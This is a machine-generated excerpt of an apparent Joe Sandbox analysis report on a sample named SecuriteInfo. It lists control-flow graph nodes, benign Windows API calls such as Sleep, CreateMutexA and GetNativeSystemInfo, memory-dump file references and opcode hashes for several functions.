                                                                                                                                                                                                                                        control_flow_graph 929 b8a326-b8a33e 930 b8a36c-b8a36e 929->930 931 b8a340-b8a34c 929->931 934 b8a379-b8a381 call b878b0 930->934 935 b8a370-b8a377 930->935 932 b8a34e-b8a35c 931->932 933 b8a362-b8a369 call b9ecf8 931->933 932->933 936 b8a41e-b8a458 call bb82fa Sleep CreateMutexA 932->936 933->930 946 b8a383-b8a38b call b878b0 934->946 947 b8a3b4-b8a3b6 934->947 938 b8a3bb-b8a3e6 call b99750 935->938 949 b8a45e-b8a466 936->949 946->947 952 b8a38d-b8a395 call b878b0 946->952 947->938 952->947 955 b8a397-b8a39f call b878b0 952->955 955->947 958 b8a3a1-b8a3a9 call b878b0 955->958 958->947 961 b8a3ab-b8a3b2 958->961 961->938
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 00B8A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00BE51D8), ref: 00B8A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: b3b215bf4414438c6c17e663659dff44900f04af64d66e78c90dac3677a02c4a
                                                                                                                                                                                                                                        • Instruction ID: e83290c1ae8107e1fcd8dc56383dbbd25f607a1a5943ba1ed7afd1453ab9351b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3b215bf4414438c6c17e663659dff44900f04af64d66e78c90dac3677a02c4a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C121F631284204A7FB24BB68888F76CB6D2DB41704F2445D6E410AA3F2CF759880C76B
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B878B0 Relevance: 2.1, APIs: 1, Instructions: 551COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 962 b878b0-b87932 call bb5780 966 b87938-b87960 call b99090 call b85d40 962->966 967 b87e1a-b87e37 call b9e681 962->967 974 b87962 966->974 975 b87964-b87986 call b99090 call b85d40 966->975 974->975 980 b87988 975->980 981 b8798a-b879a3 975->981 980->981 984 b879d4-b879ff 981->984 985 b879a5-b879b4 981->985 988 b87a30-b87a51 984->988 989 b87a01-b87a10 984->989 986 b879ca-b879d1 call b9ecf8 985->986 987 b879b6-b879c4 985->987 986->984 987->986 992 b87e38 call bb82fa 987->992 990 b87a53-b87a55 GetNativeSystemInfo 988->990 991 b87a57-b87a5c 988->991 994 b87a12-b87a20 989->994 995 b87a26-b87a2d call b9ecf8 989->995 996 b87a5d-b87a66 990->996 991->996 1003 b87e3d-b87ed1 call bb82fa call bb5780 992->1003 994->992 994->995 995->988 1001 b87a68-b87a6f 996->1001 1002 b87a84-b87a87 996->1002 1005 b87e15 1001->1005 1006 b87a75-b87a7f 1001->1006 1007 b87dbb-b87dbe 1002->1007 1008 b87a8d-b87a96 1002->1008 1037 b87edd-b87f05 call b99090 call b85d40 1003->1037 1038 b87ed3-b87ed8 1003->1038 1005->967 1010 b87e10 1006->1010 1007->1005 1013 b87dc0-b87dc9 1007->1013 1011 b87a98-b87aa4 1008->1011 1012 b87aa9-b87aac 1008->1012 1010->1005 1011->1010 1015 b87d98-b87d9a 1012->1015 1016 b87ab2-b87ab9 1012->1016 1017 b87dcb-b87dcf 1013->1017 1018 b87df0-b87df3 1013->1018 1022 b87da8-b87dab 1015->1022 1023 b87d9c-b87da6 1015->1023 1024 b87abf-b87b16 call b99090 call b85d40 call b99090 call b85d40 call b85e90 1016->1024 1025 b87b94-b87d81 call b99090 call b85d40 call b99090 call b85d40 call b85e90 call b99090 call b85d40 call b85860 call b99090 call b85d40 call b99090 call b85d40 call b85e90 call b99090 call b85d40 call b85860 call b99090 call b85d40 call b99090 call b85d40 call b85e90 call b99090 call b85d40 call b85860 1016->1025 1026 b87dd1-b87dd6 1017->1026 1027 b87de4-b87dee 1017->1027 1020 b87e01-b87e0d 1018->1020 1021 b87df5-b87dff 1018->1021 1020->1010 1021->1005 1022->1005 1030 b87dad-b87db9 1022->1030 1023->1010 1062 b87b1b-b87b22 1024->1062 1082 b87d87-b87d90 1025->1082 1026->1027 1032 b87dd8-b87de2 1026->1032 1027->1005 1030->1010 1032->1005 1056 b87f09-b87f2b call b99090 call b85d40 1037->1056 1057 b87f07 1037->1057 1041 b8801f-b8803b call b9e681 1038->1041 1074 b87f2d 1056->1074 1075 b87f2f-b87f48 1056->1075 1057->1056 1065 b87b24 1062->1065 1066 b87b26-b87b46 call bba1e1 1062->1066 1065->1066 1077 b87b48-b87b57 1066->1077 1078 b87b7d-b87b7f 1066->1078 1074->1075 1091 b87f79-b87fa4 1075->1091 1092 b87f4a-b87f59 1075->1092 1083 b87b59-b87b67 1077->1083 1084 b87b6d-b87b7a call b9ecf8 1077->1084 1081 b87b85-b87b8f 1078->1081 1078->1082 1081->1082 1082->1007 1086 b87d92 1082->1086 1083->1003 1083->1084 1084->1078 1086->1015 1097 b87fd1-b87ff2 1091->1097 1098 b87fa6-b87fb5 1091->1098 1094 b87f5b-b87f69 1092->1094 1095 b87f6f-b87f76 call b9ecf8 1092->1095 1094->1095 1099 b8803c-b88041 call bb82fa 1094->1099 1095->1091 1104 b87ff8-b87ffd 1097->1104 1105 b87ff4-b87ff6 1097->1105 1102 b87fc7-b87fce call b9ecf8 1098->1102 1103 b87fb7-b87fc5 1098->1103 1102->1097 1103->1099 1103->1102 1115 b87ffe-b88005 1104->1115 1105->1115 1115->1041 1117 b88007-b8800f 1115->1117 1119 b88018-b8801b 1117->1119 1120 b88011-b88016 1117->1120 1119->1041 1122 b8801d 1119->1122 1120->1041 1122->1041
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B87A53
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1721193555-0
                                                                                                                                                                                                                                        • Opcode ID: d8562012e51dbddba154cf7e1b14f3479944ac0a282a334c95c116f59f1e984b
                                                                                                                                                                                                                                        • Instruction ID: f2f4eab4046208ef25017eb1f94f5cb59f34e0502636d898061a30b991f493cc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d8562012e51dbddba154cf7e1b14f3479944ac0a282a334c95c116f59f1e984b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3512E571E042449BDB24FB28DC4A7AD77F1AB45314FA042D8E8156B3E2DF359E80CB92
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00BBC66B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00BC6644,?,00000000,?,00BC045F,?,00000004,00000000,?,?,?,00BBAD35), ref: 00BBC69D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 8b1ec243c14641f595eec7f3c147eb8cfb1ebddae365a541099f6ab123e79d82
                                                                                                                                                                                                                                        • Instruction ID: ca3c2612961d558a6b78da0790874dcffaa8e38f107f9b6cfbd5388a6b75001e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b1ec243c14641f595eec7f3c147eb8cfb1ebddae365a541099f6ab123e79d82
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7E06D365056216BE621A6659C41FFA3FC8DB4A3A0F3621A1FC1AA7190CEE0CC00C5E9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B88282 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?), ref: 00B88289
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
